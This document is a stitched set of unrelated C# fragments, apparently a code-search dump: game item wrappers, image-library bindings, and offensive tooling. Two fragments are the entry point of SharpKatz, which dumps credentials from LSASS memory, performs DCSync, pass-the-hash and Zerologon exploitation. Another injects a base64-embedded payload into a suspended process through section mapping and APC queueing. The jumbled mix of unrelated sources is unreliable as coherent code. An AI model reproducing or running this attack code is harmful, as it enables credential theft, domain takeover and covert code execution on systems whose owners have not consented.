public RemoteMemoryProtection(RemoteProcess process, IntPtr pointer, int size, Natives.Enumerations.MemoryProtectionFlags newProtection) : base(process, pointer) { NewProtection = newProtection; Size = size; Natives.Enumerations.MemoryProtectionFlags oldProtection; Natives.Syscall.ProtectVirtualMemory(Process.ProcessHandle, Pointer, Size, NewProtection, out oldProtection); OldProtection = oldProtection; }
/// <summary> /// Retrieves Address of native /// </summary> /// <param name="native">Using Native Enum, You can retrieve the native hash</param> /// <returns>Hash</returns> public static uint GetNative(Natives native) { if (isFinished == true) { return natives[Enum.GetName(typeof(Natives),native)]; } else { return 0x0; } }
public int GetUserData() { return((int)Natives.GetItemUserData(this)); }
public int GetCharges() { return((int)Natives.GetItemCharges(this)); }
public void SetVisible(bool flag) { Natives.SetItemVisible(this, flag); }
public void SetPawnable(bool flag) { Natives.SetItemPawnable(this, flag); }
public void SetInvulnerable(bool flag) { Natives.SetItemInvulnerable(this, flag); }
public static void Main(string[] args) { string command = null; string user = null; string guid = null; string altservice = null; string domain = null; string dc = null; string ntlmHash = null; string aes128 = null; string aes256 = null; string rc4 = null; string binary = null; string arguments = null; string luid = null; string impersonateStr = null; string authuser = null; string authdomain = null; string authpassword = null; string forcentlmStr = null; string mode = null; string auth = null; string target = null; string machineaccount = null; string nullsessionStr = null; bool showhelp = false; OptionSet opts = new OptionSet() { { "Command=", "--Command logonpasswords,ekeys,msv,kerberos,tspkg,credman,wdigest,dcsync", v => command = v }, { "User="******"--User [user]", v => user = v }, { "Guid=", "--Guid [guid]", v => guid = v }, { "Domain=", "--Domain [domain]", v => domain = v }, { "DomainController=", "--DomainController [domaincontroller]", v => dc = v }, { "NtlmHash=", "--NtlmHash [ntlmHash]", v => ntlmHash = v }, { "Aes128=", "--Aes128 [aes128]", v => aes128 = v }, { "Aes256=", "--Aes256 [aes256]", v => aes256 = v }, { "Rc4=", "--Rc4 [rc4]", v => rc4 = v }, { "Binary=", "--Binary [binary]", v => binary = v }, { "Arguments=", "--Arguments [arguments]", v => arguments = v }, { "Luid=", "--Luid [luid]", v => luid = v }, { "Impersonate=", "--Impersonate [impersonate]", v => impersonateStr = v }, { "Mode=", "--Mode [mode]", v => mode = v }, { "Auth=", "--Auth [auth]", v => auth = v }, { "Target=", "--Target [target]", v => target = v }, { "MachineAccount=", "--MachineAccount [machineaccount]", v => machineaccount = v }, { "NullSession=", "--NullSession [nullsession]", v => nullsessionStr = v }, { "AuthUser="******"--AuthUser [authuser]", v => authuser = v }, { "AuthDomain=", "--AuthDomain [authdomain]", v => authdomain = v }, { "AuthPassword="******"--AuthPassword [authpassword]", v => authpassword = v }, { "ForceNtlm=", "--ForceNtlm [forcentlm]", v => forcentlmStr = v }, { "Altservice=", "--Altservice [alternative service]", v => altservice = v }, { "h|?|help", "Show available options", v => showhelp = v != null }, }; try { opts.Parse(args); } catch (OptionException e) { Console.WriteLine(e.Message); } bool impersonate = false; try { if (!string.IsNullOrEmpty(impersonateStr)) { impersonate = bool.Parse(impersonateStr); } } catch (OptionException e) { Console.WriteLine(e.Message); } bool forcentlm = false; try { if (!string.IsNullOrEmpty(forcentlmStr)) { forcentlm = bool.Parse(forcentlmStr); } } catch (OptionException e) { Console.WriteLine(e.Message); } bool nullsession = false; try { if (!string.IsNullOrEmpty(nullsessionStr)) { nullsession = bool.Parse(nullsessionStr); } } catch (OptionException e) { Console.WriteLine(e.Message); } if (showhelp) { opts.WriteOptionDescriptions(Console.Out); Console.WriteLine(); Console.WriteLine("[*] Example: SharpKatz.exe --Command logonpasswords"); Console.WriteLine("[*] Example: SharpKatz.exe --Command ekeys"); Console.WriteLine("[*] Example: SharpKatz.exe --Command msv"); Console.WriteLine("[*] Example: SharpKatz.exe --Command kerberos"); Console.WriteLine("[*] Example: SharpKatz.exe --Command tspkg"); Console.WriteLine("[*] Example: SharpKatz.exe --Command credman"); Console.WriteLine("[*] Example: SharpKatz.exe --Command wdigest"); Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc"); Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc"); Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc"); Console.WriteLine("[*] Example: SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash"); Console.WriteLine("[*] Example: SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key"); Console.WriteLine("[*] Example: SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash"); Console.WriteLine("[*] Example: SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes128 aes256"); Console.WriteLine("[*] Example: SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$"); Console.WriteLine("[*] Example: SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$"); Console.WriteLine("[*] Example: SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local"); return; } if (string.IsNullOrEmpty(command)) { command = "logonpasswords"; } if (!command.Equals("logonpasswords") && !command.Equals("msv") && !command.Equals("kerberos") && !command.Equals("credman") && !command.Equals("tspkg") && !command.Equals("wdigest") && !command.Equals("ekeys") && !command.Equals("dcsync") && !command.Equals("pth") && !command.Equals("zerologon")) { Console.WriteLine("Unknown command"); return; } if (IntPtr.Size != 8) { Console.WriteLine("Windows 32bit not supported"); return; } OSVersionHelper osHelper = new OSVersionHelper(); osHelper.PrintOSVersion(); if (osHelper.build <= 9600) { Console.WriteLine("Unsupported OS Version"); return; } if (!command.Equals("dcsync") && !command.Equals("zerologon")) { if (!Utility.IsElevated()) { Console.WriteLine("Run in High integrity context"); return; } Utility.SetDebugPrivilege(); IntPtr lsasrv = IntPtr.Zero; IntPtr wdigest = IntPtr.Zero; IntPtr lsassmsv1 = IntPtr.Zero; IntPtr kerberos = IntPtr.Zero; IntPtr tspkg = IntPtr.Zero; IntPtr lsasslive = IntPtr.Zero; IntPtr hProcess = IntPtr.Zero; Process plsass = Process.GetProcessesByName("lsass")[0]; ProcessModuleCollection processModules = plsass.Modules; int modulefound = 0; for (int i = 0; i < processModules.Count && modulefound < 5; i++) { string lower = processModules[i].ModuleName.ToLowerInvariant(); if (lower.Contains("lsasrv.dll")) { lsasrv = processModules[i].BaseAddress; modulefound++; } else if (lower.Contains("wdigest.dll")) { wdigest = processModules[i].BaseAddress; modulefound++; } else if (lower.Contains("msv1_0.dll")) { lsassmsv1 = processModules[i].BaseAddress; modulefound++; } else if (lower.Contains("kerberos.dll")) { kerberos = processModules[i].BaseAddress; modulefound++; } else if (lower.Contains("tspkg.dll")) { tspkg = processModules[i].BaseAddress; modulefound++; } } hProcess = Natives.OpenProcess(Natives.ProcessAccessFlags.All, false, plsass.Id); Keys keys = new Keys(hProcess, lsasrv, osHelper); if (command.Equals("pth")) { if (string.IsNullOrEmpty(binary)) { binary = "cmd.exe"; } Module.Pth.CreateProcess(hProcess, lsasrv, kerberos, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), user, domain, ntlmHash, aes128, aes256, rc4, binary, arguments, luid, impersonate); } else { List <Logon> logonlist = new List <Logon>(); Module.LogonSessions.FindCredentials(hProcess, lsasrv, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); if (command.Equals("logonpasswords") || command.Equals("msv")) { Module.Msv1.FindCredentials(hProcess, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); } if (command.Equals("logonpasswords") || command.Equals("credman")) { Module.CredMan.FindCredentials(hProcess, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); } if (command.Equals("logonpasswords") || command.Equals("tspkg")) { Module.Tspkg.FindCredentials(hProcess, tspkg, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); } if (command.Equals("logonpasswords") || command.Equals("kerberos") || command.Equals("ekeys")) { List <KerberosLogonItem> klogonlist = Module.Kerberos.FindCredentials(hProcess, kerberos, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); if (command.Equals("logonpasswords") || command.Equals("kerberos")) { foreach (KerberosLogonItem l in klogonlist) { Module.Kerberos.GetCredentials(ref hProcess, l.LogonSessionBytes, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); } } if (command.Equals("ekeys")) { foreach (KerberosLogonItem l in klogonlist) { Module.Kerberos.GetKerberosKeys(ref hProcess, l.LogonSessionBytes, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); } } } if (command.Equals("logonpasswords") || command.Equals("wdigest")) { Module.WDigest.FindCredentials(hProcess, wdigest, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); } Utility.PrintLogonList(logonlist); } } else { if (command.Equals("dcsync")) { if (string.IsNullOrEmpty(domain)) { domain = Environment.GetEnvironmentVariable("USERDNSDOMAIN"); } Console.WriteLine("[!] {0} will be the domain", domain); if (string.IsNullOrEmpty(dc)) { using (DirectoryEntry rootdse = new DirectoryEntry("LDAP://RootDSE")) dc = (string)rootdse.Properties["dnshostname"].Value; } Console.WriteLine("[!] {0} will be the DC server", dc); string alt_service = "ldap"; if (!string.IsNullOrEmpty(altservice)) { alt_service = altservice; } if (!string.IsNullOrEmpty(guid)) { Console.WriteLine("[!] {0} will be the Guid", guid); Module.DCSync.FinCredential(domain, dc, guid: guid, altservice: alt_service, authuser: authuser, authdomain: authdomain, authpassword: authpassword, forcentlm: forcentlm); } else if (!string.IsNullOrEmpty(user)) { Console.WriteLine("[!] {0} will be the user account", user); Module.DCSync.FinCredential(domain, dc, user: user, altservice: alt_service, authuser: authuser, authdomain: authdomain, authpassword: authpassword, forcentlm: forcentlm); } else { Module.DCSync.FinCredential(domain, dc, altservice: alt_service, authuser: authuser, authdomain: authdomain, authpassword: authpassword, forcentlm: forcentlm, alldata: true); } } else { if (string.IsNullOrEmpty(mode) || (!mode.Equals("check") && !mode.Equals("exploit") && !mode.Equals("auto"))) { Console.WriteLine("[x] Missing or incorrect required parameter -> Mode"); return; } else if (mode.Equals("auto") && (string.IsNullOrEmpty(domain) || string.IsNullOrEmpty(dc))) { Console.WriteLine("[x] Missing required parameter -> Domain or DomainController"); return; } if (string.IsNullOrEmpty(target)) { Console.WriteLine("[x] Missing or incorrect required parameter -> Target"); return; } if (string.IsNullOrEmpty(machineaccount)) { Console.WriteLine("[x] Missing or incorrect required parameter -> MachineAccount"); return; } int authnSvc = Module.DCSync.RPC_C_AUTHN_NONE; if (!string.IsNullOrEmpty(auth)) { switch (auth) { case "noauth": authnSvc = Module.DCSync.RPC_C_AUTHN_NONE; break; case "ntlm": authnSvc = Module.DCSync.RPC_C_AUTHN_WINNT; break; case "kerberos": authnSvc = Module.DCSync.RPC_C_AUTHN_GSS_KERBEROS; break; case "negotiate": authnSvc = Module.DCSync.RPC_C_AUTHN_GSS_NEGOTIATE; break; default: Console.WriteLine("[!] Invalid Auth parameter value, use default -> AUTHN_NONE"); authnSvc = Module.DCSync.RPC_C_AUTHN_NONE; break; } } bool success = Module.Zerologon.RunZerologon(mode, target, machineaccount, authnSvc, nullsession); if (success == true) { Console.WriteLine("[*]"); if (mode.Equals("auto")) { Console.WriteLine("[!] {0} will be the domain", domain); Console.WriteLine("[!] {0} will be the DC server", dc); if (!string.IsNullOrEmpty(guid)) { Console.WriteLine("[!] {0} will be the Guid", guid); Module.DCSync.FinCredential(domain, dc, guid: guid, authuser: machineaccount, authdomain: domain, authpassword: "", forcentlm: true); } else if (!string.IsNullOrEmpty(user)) { Console.WriteLine("[!] {0} will be the user account", user); Module.DCSync.FinCredential(domain, dc, user: user, authuser: machineaccount, authdomain: domain, authpassword: "", forcentlm: true); } else { Module.DCSync.FinCredential(domain, dc, authuser: machineaccount, authdomain: domain, authpassword: "", forcentlm: true, alldata: true); } } } else { Console.WriteLine("[x] Attack failed. Target is probably patched."); } } } }
public static void Define( [MarshalAs(UnmanagedType.Bool)] Boolean isX64, [MarshalAs(UnmanagedType.U1)] Byte Syscode ) => Natives.Init(isX64, (GMLoaded.System)Syscode);
public void Initialize() { Natives.Add(new GetDateTimePrototype(GetDateTime)); }
public void SetPosition(float x, float y) { Natives.SetItemPosition(this, x, y); }
public float GetY() { return(Natives.GetItemY(this)); }
public float GetX() { return(Natives.GetItemX(this)); }
public bool IsOwned() { return(Natives.IsItemOwned(this)); }
public void SetPlayer(JassPlayer player) { Natives.SetItemPlayer(this, player, false); }
public void SetPlayer(JassPlayer player, bool changeColor) { Natives.SetItemPlayer(this, player, changeColor); }
// runlength.c (791, 1) // makeMSBitLocTab(bitval) as int[] // makeMSBitLocTab(l_int32) as l_int32 * /// <summary> /// (1) If bitval == 1, it finds the leftmost ON pixel in a byte /// otherwise if bitval == 0, it finds the leftmost OFF pixel.<para/> /// /// (2) If there are no pixels of the indicated color in the byte, /// this returns 8. /// </summary> /// <remarks> /// </remarks> /// <include file="..\CHM_Help\IncludeComments.xml" path="Comments/makeMSBitLocTab/*"/> /// <param name="bitval">[in] - either 0 or 1</param> /// <returns>table giving, for an input byte, the MS bit location, starting at 0 with the MSBit in the byte, or NULL on error.</returns> public static int[] makeMSBitLocTab( int bitval) { int[] _Result = Natives.makeMSBitLocTab(bitval); return(_Result); }
internal void SetClipboard() { Natives.OleSetClipboard(this); }
public bool IsInvulnerable() { return(Natives.IsItemInvulnerable(this)); }
public static void Main(string[] args) { string command = null; string user = null; string guid = null; string altservice = null; string domain = null; string dc = null; bool showhelp = false; OptionSet opts = new OptionSet() { { "Command=", "--Command logonpasswords,ekeys,msv,kerberos,tspkg,credman,wdigest,dcsync", v => command = v }, { "User="******"--User [user]", v => user = v }, { "Guid=", "--Guid [guid]", v => guid = v }, { "Domain=", "--Domain [domain]", v => domain = v }, { "DomainController=", "--DomainController [domaincontroller]", v => dc = v }, { "Altservice=", "--Altservice [alternative service]", v => altservice = v }, { "h|?|help", "Show available options", v => showhelp = v != null }, }; try { opts.Parse(args); } catch (OptionException e) { Console.WriteLine(e.Message); } if (showhelp) { opts.WriteOptionDescriptions(Console.Out); Console.WriteLine(); Console.WriteLine("[*] Example: SharpKatz.exe --Command logonpasswords"); Console.WriteLine("[*] Example: SharpKatz.exe --Command ekeys"); Console.WriteLine("[*] Example: SharpKatz.exe --Command msv"); Console.WriteLine("[*] Example: SharpKatz.exe --Command kerberos"); Console.WriteLine("[*] Example: SharpKatz.exe --Command tspkg"); Console.WriteLine("[*] Example: SharpKatz.exe --Command credman"); Console.WriteLine("[*] Example: SharpKatz.exe --Command wdigest"); Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc"); Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc"); Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc"); return; } if (string.IsNullOrEmpty(command)) { command = "logonpasswords"; } if (!command.Equals("logonpasswords") && !command.Equals("msv") && !command.Equals("kerberos") && !command.Equals("credman") && !command.Equals("tspkg") && !command.Equals("wdigest") && !command.Equals("ekeys") && !command.Equals("dcsync")) { Console.WriteLine("Unknown command"); return; } if (IntPtr.Size != 8) { Console.WriteLine("Windows 32bit not supported"); return; } OSVersionHelper osHelper = new OSVersionHelper(); osHelper.PrintOSVersion(); if (osHelper.build <= 9600) { Console.WriteLine("Unsupported OS Version"); return; } if (!command.Equals("dcsync")) { if (!Utility.IsElevated()) { Console.WriteLine("Run in High integrity context"); return; } Utility.SetDebugPrivilege(); IntPtr lsasrv = IntPtr.Zero; IntPtr wdigest = IntPtr.Zero; IntPtr lsassmsv1 = IntPtr.Zero; IntPtr kerberos = IntPtr.Zero; IntPtr tspkg = IntPtr.Zero; IntPtr lsasslive = IntPtr.Zero; IntPtr hProcess = IntPtr.Zero; Process plsass = Process.GetProcessesByName("lsass")[0]; ProcessModuleCollection processModules = plsass.Modules; int modulefound = 0; for (int i = 0; i < processModules.Count && modulefound < 5; i++) { if (processModules[i].ModuleName.ToLower().Contains("lsasrv.dll")) { lsasrv = processModules[i].BaseAddress; modulefound++; } if (processModules[i].ModuleName.ToLower().Contains("wdigest.dll")) { wdigest = processModules[i].BaseAddress; modulefound++; } if (processModules[i].ModuleName.ToLower().Contains("msv1_0.dll")) { lsassmsv1 = processModules[i].BaseAddress; modulefound++; } if (processModules[i].ModuleName.ToLower().Contains("kerberos.dll")) { kerberos = processModules[i].BaseAddress; modulefound++; } if (processModules[i].ModuleName.ToLower().Contains("tspkg.dll")) { tspkg = processModules[i].BaseAddress; modulefound++; } } hProcess = Natives.OpenProcess(Natives.ProcessAccessFlags.All, false, plsass.Id); List <Logon> logonlist = new List <Logon>(); Keys keys = new Keys(hProcess, lsasrv, osHelper); Module.LogonSessions.FindCredentials(hProcess, lsasrv, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); if (command.Equals("logonpasswords") || command.Equals("msv")) { Module.Msv1.FindCredentials(hProcess, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); } if (command.Equals("logonpasswords") || command.Equals("credman")) { Module.CredMan.FindCredentials(hProcess, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); } if (command.Equals("logonpasswords") || command.Equals("tspkg")) { Module.Tspkg.FindCredentials(hProcess, tspkg, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); } if (command.Equals("logonpasswords") || command.Equals("kerberos") || command.Equals("ekeys")) { List <byte[]> klogonlist = Module.Kerberos.FindCredentials(hProcess, kerberos, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); if (command.Equals("logonpasswords") || command.Equals("kerberos")) { foreach (byte[] p in klogonlist) { Module.Kerberos.GetCredentials(ref hProcess, p, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); } } if (command.Equals("ekeys")) { foreach (byte[] p in klogonlist) { Module.Kerberos.GetKerberosKeys(ref hProcess, p, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); } } } if (command.Equals("logonpasswords") || command.Equals("wdigest")) { Module.WDigest.FindCredentials(hProcess, wdigest, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist); } Utility.PrintLogonList(logonlist); } else { if (string.IsNullOrEmpty(domain)) { domain = Environment.GetEnvironmentVariable("USERDNSDOMAIN"); } Console.WriteLine("[!] {0} will be the domain", domain); if (string.IsNullOrEmpty(dc)) { DirectoryEntry rootdse = new DirectoryEntry("LDAP://RootDSE"); dc = (string)rootdse.Properties["dnshostname"].Value; } Console.WriteLine("[!] {0} will be the DC server", dc); string alt_service = "ldap"; if (!string.IsNullOrEmpty(altservice)) { alt_service = altservice; } if (!string.IsNullOrEmpty(guid)) { Console.WriteLine("[!] {0} will be the Guid", guid); Module.DCSync.FinCredential(domain, dc, guid: guid, altservice: alt_service); } else if (!string.IsNullOrEmpty(user)) { Console.WriteLine("[!] {0} will be the user account", user); Module.DCSync.FinCredential(domain, dc, user: user, altservice: alt_service); } else { Module.DCSync.FinCredential(domain, dc, altservice: alt_service, alldata: true); } } }
public bool IsPawnable() { return(Natives.IsItemPawnable(this)); }
static void Execute(string [] args) { var startInfo = new Natives.STARTUPINFO(); Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION(); Natives.LARGE_INTEGER largeinteger = new Natives.LARGE_INTEGER(); Natives.SYSTEM_INFO info = new Natives.SYSTEM_INFO(); startInfo.cb = (uint)Marshal.SizeOf(startInfo); Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES(); Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES(); pSec.nLength = Marshal.SizeOf(pSec); tSec.nLength = Marshal.SizeOf(tSec); IntPtr section = IntPtr.Zero; uint size = 0; IntPtr baseAddr = IntPtr.Zero; IntPtr viewSize = (IntPtr)size; IntPtr soffset = IntPtr.Zero; IntPtr baseAddrEx = IntPtr.Zero; IntPtr viewSizeEx = (IntPtr)size; IntPtr hToken = IntPtr.Zero; IntPtr hProcTest = IntPtr.Zero; IntPtr hTokenTest = IntPtr.Zero; uint flags = Natives.CreateSuspended | Natives.CreateNoWindow; try { if (Natives.CreateProcessWithLogonW("#USERNAME#", "#DOMAIN#", "#PASSWORD#", Natives.LogonFlags.NetCredentialsOnly, @"C:\Windows\System32\#SPAWN#", "", flags, (UInt32)0, "C:\\Windows\\System32", ref startInfo, out procInfo)) { byte[] payload = DecompressDLL(Convert.FromBase64String(nutclr)); //Round payload size to page size Natives.GetSystemInfo(ref info); size = info.dwPageSize - (uint)payload.Length % info.dwPageSize + (uint)payload.Length; largeinteger.LowPart = size; //Crteate section in current process var status = Natives.ZwCreateSection(ref section, Natives.GenericAll, IntPtr.Zero, ref largeinteger, Natives.PAGE_EXECUTE_READWRITE, Natives.SecCommit, IntPtr.Zero); //Map section to current process status = Natives.ZwMapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, IntPtr.Zero, IntPtr.Zero, soffset, ref viewSize, 1, 0, Natives.PAGE_EXECUTE_READWRITE); if (baseAddr != IntPtr.Zero) { //Copy payload to current process section Marshal.Copy(payload, 0, baseAddr, payload.Length); //Map remote section status = Natives.ZwMapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref viewSizeEx, 1, 0, Natives.PAGE_EXECUTE_READWRITE); if (baseAddrEx != IntPtr.Zero && viewSizeEx != IntPtr.Zero) { //Unmap current process section Natives.ZwUnmapViewOfSection(Natives.GetCurrentProcess(), baseAddr); // Assign address of shellcode to the target thread apc queue IntPtr th = procInfo.hThread; IntPtr ptrq = Natives.ZwQueueApcThread(th, baseAddrEx, IntPtr.Zero); Natives.ZwSetInformationThread(th, 1, IntPtr.Zero, 0); int rest = Natives.ZwResumeThread(th, out ulong outsupn); } else { Console.WriteLine("[x] Error mapping remote section"); } } else { Console.WriteLine("[x] Error mapping section to current process"); } Natives.CloseHandle(procInfo.hThread); Natives.CloseHandle(procInfo.hProcess); Natives.CloseHandle(hProcTest); Natives.CloseHandle(hTokenTest); } else { Console.WriteLine("[x] Error creating process"); } Natives.CloseHandle(hProcTest); Natives.CloseHandle(hTokenTest); } catch (Exception e) { Console.WriteLine("[x] Generic error"); } }
public bool IsVisible() { return(Natives.IsItemVisible(this)); }
// pixalloc.c (511, 1) // pmsLogInfo() as Object // pmsLogInfo() as void /// <summary> /// pmsLogInfo() /// </summary> /// <remarks> /// </remarks> /// <include file="..\CHM_Help\IncludeComments.xml" path="Comments/pmsLogInfo/*"/> public static void pmsLogInfo() { Natives.pmsLogInfo(); }
public static JassItem Create(JassObjectId itemid, float x, float y) { return(Natives.CreateItem(itemid, x, y)); }
// pixalloc.c (267, 1) // pmsDestroy() as Object // pmsDestroy() as void /// <summary> /// (1) Important: call this function at the end of the program, after /// the last pix has been destroyed. /// </summary> /// <remarks> /// </remarks> /// <include file="..\CHM_Help\IncludeComments.xml" path="Comments/pmsDestroy/*"/> public static void pmsDestroy() { Natives.pmsDestroy(); }
public void SetCharges(int charges) { Natives.SetItemCharges(this, charges); }
// binreduce.c (384, 1) // makeSubsampleTab2x() as Byte[] // makeSubsampleTab2x() as l_uint8 * /// <summary> /// This table permutes the bits in a byte, from /// 0 4 1 5 2 6 3 7 /// to /// 0 1 2 3 4 5 6 7 /// </summary> /// <remarks> /// </remarks> /// <include file="..\CHM_Help\IncludeComments.xml" path="Comments/makeSubsampleTab2x/*"/> /// <returns>tab table of 256 permutations, or NULL on error</returns> public static Byte[] makeSubsampleTab2x() { Byte[] _Result = Natives.makeSubsampleTab2x(); return(_Result); }
public void SetUserData(int data) { Natives.SetItemUserData(this, data); }
/// <summary> /// Returns true, if contains natives for specified operating system. /// </summary> public bool IsNativesFor(string operatingSystem) => IsNatives && Natives.ContainsKey(operatingSystem);
public FILE(string Filename) : this(Natives.lept_fopen(Filename, "rb")) { }
public JassPlayer GetPlayer() { return(Natives.GetItemPlayer(this)); }